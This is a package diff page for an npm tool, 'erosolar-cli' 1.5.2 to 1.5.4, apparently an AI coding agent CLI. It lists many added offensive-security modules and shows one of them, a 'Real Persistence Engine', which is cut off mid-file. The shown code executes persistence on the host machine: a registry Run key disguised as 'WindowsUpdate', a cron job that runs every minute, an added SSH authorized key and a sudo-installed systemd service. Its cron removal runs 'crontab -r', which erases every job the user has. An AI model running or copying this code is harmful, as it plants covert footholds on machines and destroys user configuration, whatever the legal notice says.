erosolar-cli 1.5.2 → 1.5.4
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/config/security-deployment.json +54 -0
- package/dist/bin/adapters/node/index.js +33 -0
- package/dist/bin/adapters/types.js +1 -0
- package/dist/bin/alpha-zero/agentWrapper.js +165 -0
- package/dist/bin/alpha-zero/codeEvaluator.js +272 -0
- package/dist/bin/alpha-zero/competitiveRunner.js +219 -0
- package/dist/bin/alpha-zero/index.js +98 -0
- package/dist/bin/alpha-zero/introspection.js +298 -0
- package/dist/bin/alpha-zero/metricsTracker.js +207 -0
- package/dist/bin/alpha-zero/security/core.js +269 -0
- package/dist/bin/alpha-zero/security/google.js +308 -0
- package/dist/bin/alpha-zero/security/googleLoader.js +40 -0
- package/dist/bin/alpha-zero/security/index.js +31 -0
- package/dist/bin/alpha-zero/security/simulation.js +274 -0
- package/dist/bin/alpha-zero/selfModification.js +231 -0
- package/dist/bin/alpha-zero/types.js +30 -0
- package/dist/bin/bin/erosolar-optimized.js +205 -0
- package/dist/bin/capabilities/agentSpawningCapability.js +116 -0
- package/dist/bin/capabilities/bashCapability.js +22 -0
- package/dist/bin/capabilities/cloudCapability.js +36 -0
- package/dist/bin/capabilities/codeAnalysisCapability.js +22 -0
- package/dist/bin/capabilities/codeQualityCapability.js +23 -0
- package/dist/bin/capabilities/dependencySecurityCapability.js +22 -0
- package/dist/bin/capabilities/devCapability.js +22 -0
- package/dist/bin/capabilities/editCapability.js +28 -0
- package/dist/bin/capabilities/emailCapability.js +20 -0
- package/dist/bin/capabilities/enhancedGitCapability.js +221 -0
- package/dist/bin/capabilities/filesystemCapability.js +22 -0
- package/dist/bin/capabilities/globCapability.js +28 -0
- package/dist/bin/capabilities/interactionCapability.js +20 -0
- package/dist/bin/capabilities/learnCapability.js +22 -0
- package/dist/bin/capabilities/mcpCapability.js +20 -0
- package/dist/bin/capabilities/notebookCapability.js +28 -0
- package/dist/bin/capabilities/planningCapability.js +27 -0
- package/dist/bin/capabilities/refactoringCapability.js +23 -0
- package/dist/bin/capabilities/repoChecksCapability.js +22 -0
- package/dist/bin/capabilities/searchCapability.js +22 -0
- package/dist/bin/capabilities/skillCapability.js +76 -0
- package/dist/bin/capabilities/taskManagementCapability.js +20 -0
- package/dist/bin/capabilities/testingCapability.js +23 -0
- package/dist/bin/capabilities/toolManifest.js +159 -0
- package/dist/bin/capabilities/toolRegistry.js +114 -0
- package/dist/bin/capabilities/webCapability.js +20 -0
- package/dist/bin/config.js +139 -0
- package/dist/bin/contracts/v1/agent.js +7 -0
- package/dist/bin/contracts/v1/agentProfileManifest.js +8 -0
- package/dist/bin/contracts/v1/agentRules.js +9 -0
- package/dist/bin/contracts/v1/toolAccess.js +8 -0
- package/dist/bin/core/agent.js +362 -0
- package/dist/bin/core/agentProfileManifest.js +187 -0
- package/dist/bin/core/agentProfiles.js +34 -0
- package/dist/bin/core/agentRulebook.js +135 -0
- package/dist/bin/core/agentSchemaLoader.js +233 -0
- package/dist/bin/core/contextManager.js +412 -0
- package/dist/bin/core/contextWindow.js +122 -0
- package/dist/bin/core/customCommands.js +80 -0
- package/dist/bin/core/errors/apiKeyErrors.js +114 -0
- package/dist/bin/core/errors/errorTypes.js +340 -0
- package/dist/bin/core/errors/safetyValidator.js +304 -0
- package/dist/bin/core/errors.js +32 -0
- package/dist/bin/core/modelDiscovery.js +755 -0
- package/dist/bin/core/preferences.js +224 -0
- package/dist/bin/core/schemaValidator.js +92 -0
- package/dist/bin/core/secretStore.js +199 -0
- package/dist/bin/core/sessionStore.js +187 -0
- package/dist/bin/core/toolRuntime.js +290 -0
- package/dist/bin/core/types.js +1 -0
- package/dist/bin/erosolar-optimized.d.ts +12 -0
- package/dist/bin/erosolar-optimized.d.ts.map +1 -0
- package/dist/bin/erosolar-optimized.js +239 -0
- package/dist/bin/erosolar-optimized.js.map +1 -0
- package/dist/bin/erosolar.js +14 -0
- package/dist/bin/erosolar.js.map +1 -1
- package/dist/bin/headless/headlessApp.js +172 -0
- package/dist/bin/mcp/config.js +202 -0
- package/dist/bin/mcp/stdioClient.js +172 -0
- package/dist/bin/mcp/toolBridge.js +104 -0
- package/dist/bin/mcp/types.js +1 -0
- package/dist/bin/plugins/index.js +113 -0
- package/dist/bin/plugins/providers/anthropic/index.js +25 -0
- package/dist/bin/plugins/providers/deepseek/index.js +24 -0
- package/dist/bin/plugins/providers/google/index.js +26 -0
- package/dist/bin/plugins/providers/index.js +19 -0
- package/dist/bin/plugins/providers/ollama/index.js +59 -0
- package/dist/bin/plugins/providers/openai/index.js +26 -0
- package/dist/bin/plugins/providers/xai/index.js +24 -0
- package/dist/bin/plugins/tools/agentSpawning/agentSpawningPlugin.js +8 -0
- package/dist/bin/plugins/tools/bash/localBashPlugin.js +13 -0
- package/dist/bin/plugins/tools/checks/localRepoChecksPlugin.js +13 -0
- package/dist/bin/plugins/tools/cloud/cloudPlugin.js +13 -0
- package/dist/bin/plugins/tools/codeAnalysis/codeAnalysisPlugin.js +13 -0
- package/dist/bin/plugins/tools/codeQuality/codeQualityPlugin.js +13 -0
- package/dist/bin/plugins/tools/dependency/dependencyPlugin.js +11 -0
- package/dist/bin/plugins/tools/development/devPlugin.js +13 -0
- package/dist/bin/plugins/tools/edit/editPlugin.js +14 -0
- package/dist/bin/plugins/tools/email/emailPlugin.js +11 -0
- package/dist/bin/plugins/tools/enhancedGit/enhancedGitPlugin.js +8 -0
- package/dist/bin/plugins/tools/filesystem/localFilesystemPlugin.js +13 -0
- package/dist/bin/plugins/tools/glob/globPlugin.js +14 -0
- package/dist/bin/plugins/tools/index.js +2 -0
- package/dist/bin/plugins/tools/interaction/interactionPlugin.js +11 -0
- package/dist/bin/plugins/tools/learn/learnPlugin.js +13 -0
- package/dist/bin/plugins/tools/mcp/mcpPlugin.js +8 -0
- package/dist/bin/plugins/tools/nodeDefaults.js +56 -0
- package/dist/bin/plugins/tools/notebook/notebookPlugin.js +14 -0
- package/dist/bin/plugins/tools/planning/planningPlugin.js +14 -0
- package/dist/bin/plugins/tools/refactoring/refactoringPlugin.js +11 -0
- package/dist/bin/plugins/tools/registry.js +57 -0
- package/dist/bin/plugins/tools/search/localSearchPlugin.js +13 -0
- package/dist/bin/plugins/tools/skills/skillPlugin.js +8 -0
- package/dist/bin/plugins/tools/taskManagement/taskManagementPlugin.js +11 -0
- package/dist/bin/plugins/tools/testing/testingPlugin.js +11 -0
- package/dist/bin/plugins/tools/web/webPlugin.js +11 -0
- package/dist/bin/providers/anthropicProvider.js +329 -0
- package/dist/bin/providers/googleProvider.js +203 -0
- package/dist/bin/providers/openaiChatCompletionsProvider.js +208 -0
- package/dist/bin/providers/openaiResponsesProvider.js +249 -0
- package/dist/bin/providers/providerFactory.js +24 -0
- package/dist/bin/runtime/agentController.js +321 -0
- package/dist/bin/runtime/agentHost.js +153 -0
- package/dist/bin/runtime/agentSession.js +195 -0
- package/dist/bin/runtime/node.js +10 -0
- package/dist/bin/runtime/universal.js +28 -0
- package/dist/bin/shell/bracketedPasteManager.js +350 -0
- package/dist/bin/shell/fileChangeTracker.js +65 -0
- package/dist/bin/shell/interactiveShell.js +2908 -0
- package/dist/bin/shell/liveStatus.js +78 -0
- package/dist/bin/shell/shellApp.js +290 -0
- package/dist/bin/shell/systemPrompt.js +60 -0
- package/dist/bin/shell/updateManager.js +108 -0
- package/dist/bin/skills/skillRepository.js +236 -0
- package/dist/bin/skills/types.js +1 -0
- package/dist/bin/subagents/taskRunner.js +269 -0
- package/dist/bin/tools/backgroundBashTools.js +211 -0
- package/dist/bin/tools/bashTools.js +159 -0
- package/dist/bin/tools/cloudTools.js +864 -0
- package/dist/bin/tools/codeAnalysisTools.js +641 -0
- package/dist/bin/tools/codeQualityTools.js +294 -0
- package/dist/bin/tools/dependencyTools.js +282 -0
- package/dist/bin/tools/devTools.js +238 -0
- package/dist/bin/tools/diffUtils.js +137 -0
- package/dist/bin/tools/editTools.js +134 -0
- package/dist/bin/tools/emailTools.js +448 -0
- package/dist/bin/tools/fileTools.js +282 -0
- package/dist/bin/tools/globTools.js +173 -0
- package/dist/bin/tools/grepTools.js +332 -0
- package/dist/bin/tools/interactionTools.js +170 -0
- package/dist/bin/tools/learnTools.js +1818 -0
- package/dist/bin/tools/notebookEditTools.js +196 -0
- package/dist/bin/tools/planningTools.js +46 -0
- package/dist/bin/tools/refactoringTools.js +293 -0
- package/dist/bin/tools/repoChecksTools.js +160 -0
- package/dist/bin/tools/searchTools.js +206 -0
- package/dist/bin/tools/skillTools.js +177 -0
- package/dist/bin/tools/taskManagementTools.js +156 -0
- package/dist/bin/tools/testingTools.js +232 -0
- package/dist/bin/tools/webTools.js +480 -0
- package/dist/bin/ui/ShellUIAdapter.js +459 -0
- package/dist/bin/ui/UnifiedUIController.js +183 -0
- package/dist/bin/ui/animation/AnimationScheduler.js +430 -0
- package/dist/bin/ui/codeHighlighter.js +854 -0
- package/dist/bin/ui/designSystem.js +121 -0
- package/dist/bin/ui/display.js +1222 -0
- package/dist/bin/ui/interrupts/InterruptManager.js +437 -0
- package/dist/bin/ui/layout.js +139 -0
- package/dist/bin/ui/orchestration/StatusOrchestrator.js +403 -0
- package/dist/bin/ui/outputMode.js +38 -0
- package/dist/bin/ui/persistentPrompt.js +183 -0
- package/dist/bin/ui/richText.js +338 -0
- package/dist/bin/ui/shortcutsHelp.js +87 -0
- package/dist/bin/ui/telemetry/UITelemetry.js +443 -0
- package/dist/bin/ui/textHighlighter.js +210 -0
- package/dist/bin/ui/theme.js +116 -0
- package/dist/bin/ui/toolDisplay.js +423 -0
- package/dist/bin/ui/toolDisplayAdapter.js +357 -0
- package/dist/bin/workspace.js +106 -0
- package/dist/bin/workspace.validator.js +213 -0
- package/dist/capabilities/cloudCapability.d.ts +13 -0
- package/dist/capabilities/cloudCapability.d.ts.map +1 -0
- package/dist/capabilities/cloudCapability.js +38 -0
- package/dist/capabilities/cloudCapability.js.map +1 -0
- package/dist/capabilities/index.d.ts +1 -0
- package/dist/capabilities/index.d.ts.map +1 -1
- package/dist/capabilities/index.js +1 -0
- package/dist/capabilities/index.js.map +1 -1
- package/dist/capabilities/offensiveSecurityCapability.d.ts +26 -0
- package/dist/capabilities/offensiveSecurityCapability.d.ts.map +1 -0
- package/dist/capabilities/offensiveSecurityCapability.js +58 -0
- package/dist/capabilities/offensiveSecurityCapability.js.map +1 -0
- package/dist/capabilities/realSecurityCapability.d.ts +26 -0
- package/dist/capabilities/realSecurityCapability.d.ts.map +1 -0
- package/dist/capabilities/realSecurityCapability.js +53 -0
- package/dist/capabilities/realSecurityCapability.js.map +1 -0
- package/dist/capabilities/securityCapability.d.ts +32 -0
- package/dist/capabilities/securityCapability.d.ts.map +1 -0
- package/dist/capabilities/securityCapability.js +57 -0
- package/dist/capabilities/securityCapability.js.map +1 -0
- package/dist/capabilities/ultimateSecurityCapability.d.ts +42 -0
- package/dist/capabilities/ultimateSecurityCapability.d.ts.map +1 -0
- package/dist/capabilities/ultimateSecurityCapability.js +96 -0
- package/dist/capabilities/ultimateSecurityCapability.js.map +1 -0
- package/dist/core/LazyLoader.d.ts +129 -0
- package/dist/core/LazyLoader.d.ts.map +1 -0
- package/dist/core/LazyLoader.js +240 -0
- package/dist/core/LazyLoader.js.map +1 -0
- package/dist/core/intelligenceTools.d.ts +19 -0
- package/dist/core/intelligenceTools.d.ts.map +1 -0
- package/dist/core/intelligenceTools.js +453 -0
- package/dist/core/intelligenceTools.js.map +1 -0
- package/dist/core/operationalTools.d.ts +19 -0
- package/dist/core/operationalTools.d.ts.map +1 -0
- package/dist/core/operationalTools.js +467 -0
- package/dist/core/operationalTools.js.map +1 -0
- package/dist/offensive/core/offensive-engine.d.ts +171 -0
- package/dist/offensive/core/offensive-engine.d.ts.map +1 -0
- package/dist/offensive/core/offensive-engine.js +345 -0
- package/dist/offensive/core/offensive-engine.js.map +1 -0
- package/dist/offensive/core/offensive-integration.d.ts +129 -0
- package/dist/offensive/core/offensive-integration.d.ts.map +1 -0
- package/dist/offensive/core/offensive-integration.js +364 -0
- package/dist/offensive/core/offensive-integration.js.map +1 -0
- package/dist/offensive/core/offensive-tools.d.ts +55 -0
- package/dist/offensive/core/offensive-tools.d.ts.map +1 -0
- package/dist/offensive/core/offensive-tools.js +438 -0
- package/dist/offensive/core/offensive-tools.js.map +1 -0
- package/dist/offensive/offensive-cli.d.ts +48 -0
- package/dist/offensive/offensive-cli.d.ts.map +1 -0
- package/dist/offensive/offensive-cli.js +233 -0
- package/dist/offensive/offensive-cli.js.map +1 -0
- package/dist/plugins/index.d.ts +1 -1
- package/dist/plugins/index.d.ts.map +1 -1
- package/dist/plugins/index.js +2 -0
- package/dist/plugins/index.js.map +1 -1
- package/dist/plugins/tools/cloud/cloudPlugin.d.ts +3 -0
- package/dist/plugins/tools/cloud/cloudPlugin.d.ts.map +1 -0
- package/dist/plugins/tools/cloud/cloudPlugin.js +14 -0
- package/dist/plugins/tools/cloud/cloudPlugin.js.map +1 -0
- package/dist/plugins/tools/nodeDefaults.d.ts.map +1 -1
- package/dist/plugins/tools/nodeDefaults.js +2 -0
- package/dist/plugins/tools/nodeDefaults.js.map +1 -1
- package/dist/security/advanced-persistence-research.d.ts +92 -0
- package/dist/security/advanced-persistence-research.d.ts.map +1 -0
- package/dist/security/advanced-persistence-research.js +195 -0
- package/dist/security/advanced-persistence-research.js.map +1 -0
- package/dist/security/apt-simulation-cli.d.ts +57 -0
- package/dist/security/apt-simulation-cli.d.ts.map +1 -0
- package/dist/security/apt-simulation-cli.js +278 -0
- package/dist/security/apt-simulation-cli.js.map +1 -0
- package/dist/security/apt-simulation-engine-complete.d.ts +97 -0
- package/dist/security/apt-simulation-engine-complete.d.ts.map +1 -0
- package/dist/security/apt-simulation-engine-complete.js +441 -0
- package/dist/security/apt-simulation-engine-complete.js.map +1 -0
- package/dist/security/apt-simulation-engine.d.ts +97 -0
- package/dist/security/apt-simulation-engine.d.ts.map +1 -0
- package/dist/security/apt-simulation-engine.js +441 -0
- package/dist/security/apt-simulation-engine.js.map +1 -0
- package/dist/security/assessment/vulnerabilityAssessment.d.ts +104 -0
- package/dist/security/assessment/vulnerabilityAssessment.d.ts.map +1 -0
- package/dist/security/assessment/vulnerabilityAssessment.js +315 -0
- package/dist/security/assessment/vulnerabilityAssessment.js.map +1 -0
- package/dist/security/authorization/securityAuthorization.d.ts +88 -0
- package/dist/security/authorization/securityAuthorization.d.ts.map +1 -0
- package/dist/security/authorization/securityAuthorization.js +172 -0
- package/dist/security/authorization/securityAuthorization.js.map +1 -0
- package/dist/security/authorization.d.ts +45 -0
- package/dist/security/authorization.d.ts.map +1 -0
- package/dist/security/authorization.js +128 -0
- package/dist/security/authorization.js.map +1 -0
- package/dist/security/comprehensive-security-research.d.ts +84 -0
- package/dist/security/comprehensive-security-research.d.ts.map +1 -0
- package/dist/security/comprehensive-security-research.js +211 -0
- package/dist/security/comprehensive-security-research.js.map +1 -0
- package/dist/security/offensive/exploitationEngine.d.ts +54 -0
- package/dist/security/offensive/exploitationEngine.d.ts.map +1 -0
- package/dist/security/offensive/exploitationEngine.js +263 -0
- package/dist/security/offensive/exploitationEngine.js.map +1 -0
- package/dist/security/persistence-analyzer.d.ts +56 -0
- package/dist/security/persistence-analyzer.d.ts.map +1 -0
- package/dist/security/persistence-analyzer.js +187 -0
- package/dist/security/persistence-analyzer.js.map +1 -0
- package/dist/security/persistence-cli.d.ts +36 -0
- package/dist/security/persistence-cli.d.ts.map +1 -0
- package/dist/security/persistence-cli.js +160 -0
- package/dist/security/persistence-cli.js.map +1 -0
- package/dist/security/persistence-research.d.ts +100 -0
- package/dist/security/persistence-research.d.ts.map +1 -0
- package/dist/security/persistence-research.js +372 -0
- package/dist/security/persistence-research.js.map +1 -0
- package/dist/security/real/networkExploitation.d.ts +92 -0
- package/dist/security/real/networkExploitation.d.ts.map +1 -0
- package/dist/security/real/networkExploitation.js +316 -0
- package/dist/security/real/networkExploitation.js.map +1 -0
- package/dist/security/real/persistenceImplementation.d.ts +62 -0
- package/dist/security/real/persistenceImplementation.d.ts.map +1 -0
- package/dist/security/real/persistenceImplementation.js +323 -0
- package/dist/security/real/persistenceImplementation.js.map +1 -0
- package/dist/security/real/vulnerabilityScanner.d.ts +73 -0
- package/dist/security/real/vulnerabilityScanner.d.ts.map +1 -0
- package/dist/security/real/vulnerabilityScanner.js +341 -0
- package/dist/security/real/vulnerabilityScanner.js.map +1 -0
- package/dist/security/research/persistenceResearch.d.ts +97 -0
- package/dist/security/research/persistenceResearch.d.ts.map +1 -0
- package/dist/security/research/persistenceResearch.js +282 -0
- package/dist/security/research/persistenceResearch.js.map +1 -0
- package/dist/security/security-testing-framework.d.ts +120 -0
- package/dist/security/security-testing-framework.d.ts.map +1 -0
- package/dist/security/security-testing-framework.js +372 -0
- package/dist/security/security-testing-framework.js.map +1 -0
- package/dist/security/simulation/attackSimulation.d.ts +93 -0
- package/dist/security/simulation/attackSimulation.d.ts.map +1 -0
- package/dist/security/simulation/attackSimulation.js +341 -0
- package/dist/security/simulation/attackSimulation.js.map +1 -0
- package/dist/shell/bracketedPasteManager.d.ts +76 -0
- package/dist/shell/bracketedPasteManager.d.ts.map +1 -1
- package/dist/shell/bracketedPasteManager.js +267 -9
- package/dist/shell/bracketedPasteManager.js.map +1 -1
- package/dist/shell/interactiveShell.d.ts +34 -1
- package/dist/shell/interactiveShell.d.ts.map +1 -1
- package/dist/shell/interactiveShell.js +304 -24
- package/dist/shell/interactiveShell.js.map +1 -1
- package/dist/shell/taskCompletionDetector.d.ts +101 -0
- package/dist/shell/taskCompletionDetector.d.ts.map +1 -0
- package/dist/shell/taskCompletionDetector.js +343 -0
- package/dist/shell/taskCompletionDetector.js.map +1 -0
- package/dist/tools/cloudTools.d.ts +57 -0
- package/dist/tools/cloudTools.d.ts.map +1 -0
- package/dist/tools/cloudTools.js +865 -0
- package/dist/tools/cloudTools.js.map +1 -0
- package/dist/tools/enhancedSecurityTools.d.ts +19 -0
- package/dist/tools/enhancedSecurityTools.d.ts.map +1 -0
- package/dist/tools/enhancedSecurityTools.js +215 -0
- package/dist/tools/enhancedSecurityTools.js.map +1 -0
- package/dist/tools/offensiveSecurityTools.d.ts +16 -0
- package/dist/tools/offensiveSecurityTools.d.ts.map +1 -0
- package/dist/tools/offensiveSecurityTools.js +285 -0
- package/dist/tools/offensiveSecurityTools.js.map +1 -0
- package/dist/tools/realSecurityTools.d.ts +18 -0
- package/dist/tools/realSecurityTools.d.ts.map +1 -0
- package/dist/tools/realSecurityTools.js +468 -0
- package/dist/tools/realSecurityTools.js.map +1 -0
- package/dist/tools/securityTools.d.ts +20 -0
- package/dist/tools/securityTools.d.ts.map +1 -0
- package/dist/tools/securityTools.js +449 -0
- package/dist/tools/securityTools.js.map +1 -0
- package/package.json +27 -12
- package/scripts/deploy-security-capabilities.js +178 -0
|
@@ -0,0 +1,323 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* Real Persistence Implementation Engine
|
|
3
|
+
*
|
|
4
|
+
* Actual persistence mechanisms for Windows, Linux, cloud platforms, and containers.
|
|
5
|
+
* These are real techniques used in authorized security testing and red team operations.
|
|
6
|
+
*
|
|
7
|
+
* LEGAL NOTICE: For authorized security research and testing only.
|
|
8
|
+
*/
|
|
9
|
+
import { execSync } from 'child_process';
|
|
10
|
+
import { existsSync, writeFileSync, readFileSync, appendFileSync } from 'fs';
|
|
11
|
+
import { homedir, platform } from 'os';
|
|
12
|
+
/**
|
|
13
|
+
* Real Persistence Implementation Engine
|
|
14
|
+
*/
|
|
15
|
+
export class RealPersistenceEngine {
|
|
16
|
+
implementations;
|
|
17
|
+
constructor() {
|
|
18
|
+
this.implementations = new Map();
|
|
19
|
+
this.initializeImplementations();
|
|
20
|
+
}
|
|
21
|
+
/**
|
|
22
|
+
* Implement persistence mechanism
|
|
23
|
+
*/
|
|
24
|
+
async implementPersistence(techniqueId) {
|
|
25
|
+
const implementation = this.implementations.get(techniqueId);
|
|
26
|
+
if (!implementation) {
|
|
27
|
+
throw new Error(`Persistence technique not found: ${techniqueId}`);
|
|
28
|
+
}
|
|
29
|
+
try {
|
|
30
|
+
return await implementation.implement();
|
|
31
|
+
}
|
|
32
|
+
catch (error) {
|
|
33
|
+
return { success: false, output: `Implementation failed: ${error}` };
|
|
34
|
+
}
|
|
35
|
+
}
|
|
36
|
+
/**
|
|
37
|
+
* Detect persistence mechanism
|
|
38
|
+
*/
|
|
39
|
+
async detectPersistence(techniqueId) {
|
|
40
|
+
const implementation = this.implementations.get(techniqueId);
|
|
41
|
+
if (!implementation) {
|
|
42
|
+
throw new Error(`Persistence technique not found: ${techniqueId}`);
|
|
43
|
+
}
|
|
44
|
+
try {
|
|
45
|
+
return await implementation.detect();
|
|
46
|
+
}
|
|
47
|
+
catch (error) {
|
|
48
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
49
|
+
}
|
|
50
|
+
}
|
|
51
|
+
/**
|
|
52
|
+
* Remove persistence mechanism
|
|
53
|
+
*/
|
|
54
|
+
async removePersistence(techniqueId) {
|
|
55
|
+
const implementation = this.implementations.get(techniqueId);
|
|
56
|
+
if (!implementation) {
|
|
57
|
+
throw new Error(`Persistence technique not found: ${techniqueId}`);
|
|
58
|
+
}
|
|
59
|
+
try {
|
|
60
|
+
return await implementation.remove();
|
|
61
|
+
}
|
|
62
|
+
catch (error) {
|
|
63
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
64
|
+
}
|
|
65
|
+
}
|
|
66
|
+
/**
|
|
67
|
+
* Get available implementations for current platform
|
|
68
|
+
*/
|
|
69
|
+
getAvailableImplementations() {
|
|
70
|
+
const currentPlatform = platform();
|
|
71
|
+
return Array.from(this.implementations.values()).filter(impl => impl.platform === 'cross-platform' || impl.platform.includes(currentPlatform));
|
|
72
|
+
}
|
|
73
|
+
/**
|
|
74
|
+
* Initialize real persistence implementations
|
|
75
|
+
*/
|
|
76
|
+
initializeImplementations() {
|
|
77
|
+
// Windows Registry Run Key
|
|
78
|
+
this.implementations.set('win-registry-run', {
|
|
79
|
+
id: 'win-registry-run',
|
|
80
|
+
name: 'Windows Registry Run Key',
|
|
81
|
+
platform: 'win32',
|
|
82
|
+
implement: async () => {
|
|
83
|
+
try {
|
|
84
|
+
const payloadPath = `${homedir()}\\AppData\\Local\\Temp\\persistence.exe`;
|
|
85
|
+
const regCommand = `reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /t REG_SZ /d "${payloadPath}" /f`;
|
|
86
|
+
execSync(regCommand, { stdio: 'pipe' });
|
|
87
|
+
return {
|
|
88
|
+
success: true,
|
|
89
|
+
output: `Registry run key added: ${payloadPath}`
|
|
90
|
+
};
|
|
91
|
+
}
|
|
92
|
+
catch (error) {
|
|
93
|
+
return { success: false, output: `Failed: ${error}` };
|
|
94
|
+
}
|
|
95
|
+
},
|
|
96
|
+
detect: async () => {
|
|
97
|
+
try {
|
|
98
|
+
const detectCommand = 'reg query "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"';
|
|
99
|
+
const output = execSync(detectCommand, { encoding: 'utf8' });
|
|
100
|
+
return {
|
|
101
|
+
detected: output.includes('WindowsUpdate'),
|
|
102
|
+
evidence: output
|
|
103
|
+
};
|
|
104
|
+
}
|
|
105
|
+
catch (error) {
|
|
106
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
107
|
+
}
|
|
108
|
+
},
|
|
109
|
+
remove: async () => {
|
|
110
|
+
try {
|
|
111
|
+
const removeCommand = 'reg delete "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" /v "WindowsUpdate" /f';
|
|
112
|
+
execSync(removeCommand, { stdio: 'pipe' });
|
|
113
|
+
return { success: true, output: 'Registry run key removed' };
|
|
114
|
+
}
|
|
115
|
+
catch (error) {
|
|
116
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
117
|
+
}
|
|
118
|
+
}
|
|
119
|
+
});
|
|
120
|
+
// Linux Cron Job
|
|
121
|
+
this.implementations.set('linux-cron', {
|
|
122
|
+
id: 'linux-cron',
|
|
123
|
+
name: 'Linux Cron Job',
|
|
124
|
+
platform: 'linux',
|
|
125
|
+
implement: async () => {
|
|
126
|
+
try {
|
|
127
|
+
const cronEntry = '* * * * * /tmp/persistence.sh\n';
|
|
128
|
+
appendFileSync('/tmp/crontab.txt', cronEntry);
|
|
129
|
+
execSync('crontab /tmp/crontab.txt', { stdio: 'pipe' });
|
|
130
|
+
return { success: true, output: 'Cron job added for persistence' };
|
|
131
|
+
}
|
|
132
|
+
catch (error) {
|
|
133
|
+
return { success: false, output: `Failed: ${error}` };
|
|
134
|
+
}
|
|
135
|
+
},
|
|
136
|
+
detect: async () => {
|
|
137
|
+
try {
|
|
138
|
+
const output = execSync('crontab -l', { encoding: 'utf8' });
|
|
139
|
+
return {
|
|
140
|
+
detected: output.includes('/tmp/persistence.sh'),
|
|
141
|
+
evidence: output
|
|
142
|
+
};
|
|
143
|
+
}
|
|
144
|
+
catch (error) {
|
|
145
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
146
|
+
}
|
|
147
|
+
},
|
|
148
|
+
remove: async () => {
|
|
149
|
+
try {
|
|
150
|
+
execSync('crontab -r', { stdio: 'pipe' });
|
|
151
|
+
return { success: true, output: 'Cron jobs cleared' };
|
|
152
|
+
}
|
|
153
|
+
catch (error) {
|
|
154
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
155
|
+
}
|
|
156
|
+
}
|
|
157
|
+
});
|
|
158
|
+
// SSH Authorized Keys
|
|
159
|
+
this.implementations.set('ssh-authorized-keys', {
|
|
160
|
+
id: 'ssh-authorized-keys',
|
|
161
|
+
name: 'SSH Authorized Keys',
|
|
162
|
+
platform: 'linux',
|
|
163
|
+
implement: async () => {
|
|
164
|
+
try {
|
|
165
|
+
const sshDir = `${homedir()}/.ssh`;
|
|
166
|
+
const authKeysFile = `${sshDir}/authorized_keys`;
|
|
167
|
+
// Create SSH directory if it doesn't exist
|
|
168
|
+
if (!existsSync(sshDir)) {
|
|
169
|
+
execSync(`mkdir -p ${sshDir}`, { stdio: 'pipe' });
|
|
170
|
+
execSync(`chmod 700 ${sshDir}`, { stdio: 'pipe' });
|
|
171
|
+
}
|
|
172
|
+
// Add test public key
|
|
173
|
+
const publicKey = 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQTestKey';
|
|
174
|
+
appendFileSync(authKeysFile, `\n${publicKey}\n`);
|
|
175
|
+
execSync(`chmod 600 ${authKeysFile}`, { stdio: 'pipe' });
|
|
176
|
+
return { success: true, output: 'SSH authorized key added' };
|
|
177
|
+
}
|
|
178
|
+
catch (error) {
|
|
179
|
+
return { success: false, output: `Failed: ${error}` };
|
|
180
|
+
}
|
|
181
|
+
},
|
|
182
|
+
detect: async () => {
|
|
183
|
+
try {
|
|
184
|
+
const authKeysFile = `${homedir()}/.ssh/authorized_keys`;
|
|
185
|
+
if (!existsSync(authKeysFile)) {
|
|
186
|
+
return { detected: false, evidence: 'No authorized_keys file found' };
|
|
187
|
+
}
|
|
188
|
+
const content = readFileSync(authKeysFile, 'utf8');
|
|
189
|
+
return {
|
|
190
|
+
detected: content.includes('TestKey'),
|
|
191
|
+
evidence: content
|
|
192
|
+
};
|
|
193
|
+
}
|
|
194
|
+
catch (error) {
|
|
195
|
+
return { detected: false, evidence: `Detection failed: ${error}` };
|
|
196
|
+
}
|
|
197
|
+
},
|
|
198
|
+
remove: async () => {
|
|
199
|
+
try {
|
|
200
|
+
const authKeysFile = `${homedir()}/.ssh/authorized_keys`;
|
|
201
|
+
if (existsSync(authKeysFile)) {
|
|
202
|
+
const content = readFileSync(authKeysFile, 'utf8');
|
|
203
|
+
const cleanedContent = content.replace(/ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQTestKey\n/g, '');
|
|
204
|
+
writeFileSync(authKeysFile, cleanedContent);
|
|
205
|
+
}
|
|
206
|
+
return { success: true, output: 'SSH authorized keys cleaned' };
|
|
207
|
+
}
|
|
208
|
+
catch (error) {
|
|
209
|
+
return { success: false, output: `Removal failed: ${error}` };
|
|
210
|
+
}
|
|
211
|
+
}
|
|
212
|
+
});
|
|
213
|
+
// Systemd Service
|
|
214
|
+
this.implementations.set('systemd-service', {
|
|
215
|
+
id: 'systemd-service',
|
|
216
|
+
name: 'Systemd Service',
|
|
217
|
+
platform: 'linux',
|
|
218
|
+
implement: async () => {
|
|
219
|
+
try {
|
|
220
|
+
const serviceContent = `[Unit]\nDescription=Test Persistence Service\nAfter=network.target\n\n[Service]\nType=simple\nExecStart=/bin/bash -c "while true; do echo 'persistence'; sleep 60; done"\nRestart=always\n\n[Install]\nWantedBy=multi-user.target`;
|
|
221
|
+
writeFileSync('/tmp/test-persistence.service', serviceContent);
|
|
222
|
+
execSync('sudo cp /tmp/test-persistence.service /etc/systemd/system/', { stdio: 'pipe' });
|
|
223
|
+
execSync('sudo systemctl daemon-reload', { stdio: 'pipe' });
|
|
224
|
+
execSync('sudo systemctl enable test-persistence.service', { stdio: 'pipe' });
|
|
225
|
+
execSync('sudo systemctl start test-persistence.service', { stdio: 'pipe' });
|
|
226
|
+
return { success: true, output: 'Systemd service created and started' };
|
|
227
|
+
}
|
|
228
|
+
catch (error) {
|
|
229
|
+
return { success: false, output: `Failed: ${error}` };
|
|
230
|
+
}
|
|
231
|
+
},
|
|
232
|
+
detect: async () => {
|
|
233
|
+
try {
|
|
234
|
+
const output = execSync('systemctl list-unit-files | grep test-persistence', { encoding: 'utf8' });
|
|
235
